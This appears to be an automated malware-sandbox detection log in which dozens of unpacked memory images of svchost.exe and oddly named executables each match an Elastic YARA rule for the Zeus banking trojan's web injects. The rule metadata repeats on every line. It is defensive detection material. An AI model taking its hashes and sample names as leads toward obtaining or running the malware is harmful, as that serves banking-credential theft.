    Source: 23.2.cUKxeliGgCix.exe.3200000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.23.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.13.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 33.2.cUKxeliGgCix.exe.32f0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.21.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.14.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.25.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 37.2.cUKxeliGgCix.exe.3140000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.29.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.15.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.20.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 23.2.cUKxeliGgCix.exe.2e42000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.407000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 21.2.cUKxeliGgCix.exe.22d2000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.30.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 33.2.cUKxeliGgCix.exe.3152000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 25.2.cUKxeliGgCix.exe.8f0000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.13.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.23.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.29b2000.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.2a60000.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.28.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.33.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.cUKxeliGgCix.exe.3100000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 13.2.cUKxeliGgCix.exe.2e42000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.cUKxeliGgCix.exe.fe2000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 0.2.5AFlyarMds.exe.407000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 37.2.cUKxeliGgCix.exe.2d32000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.2a06c00.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.2.svchost.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 15.2.cUKxeliGgCix.exe.2482000.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 23.2.cUKxeliGgCix.exe.3200000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.14.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 35.2.cUKxeliGgCix.exe.20c0000.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 19.2.cUKxeliGgCix.exe.2542000.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 31.2.cUKxeliGgCix.exe.1040000.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.27.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.31.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.40.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.20.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.39c0000.37.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
    Source: 1.3.svchost.exe.88d400.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Zeus_e51c60d7 reference_sample = d7e9cb60674e0a05ad17eb96f8796d9f23844a33f83aba5e207b81979d0f2bf3, os = windows, severity = x86, description = Detects strings used in Zeus web injects. Many other malware families are built on Zeus and may hit on this signature., creation_date = 2021-02-07, scan_context = file, memory, reference = https://www.virusbulletin.com/virusbulletin/2014/10/paper-evolution-webinjects, license = Elastic License v2, threat_name = Windows.Trojan.Zeus, fingerprint = 813e2ee2447fcffdde6519dc6c52369a5d06c668b76c63bb8b65809805ecefba, id = e51c60d7-3afa-4cf5-91d8-7782e5026e46, last_modified = 2021-10-04
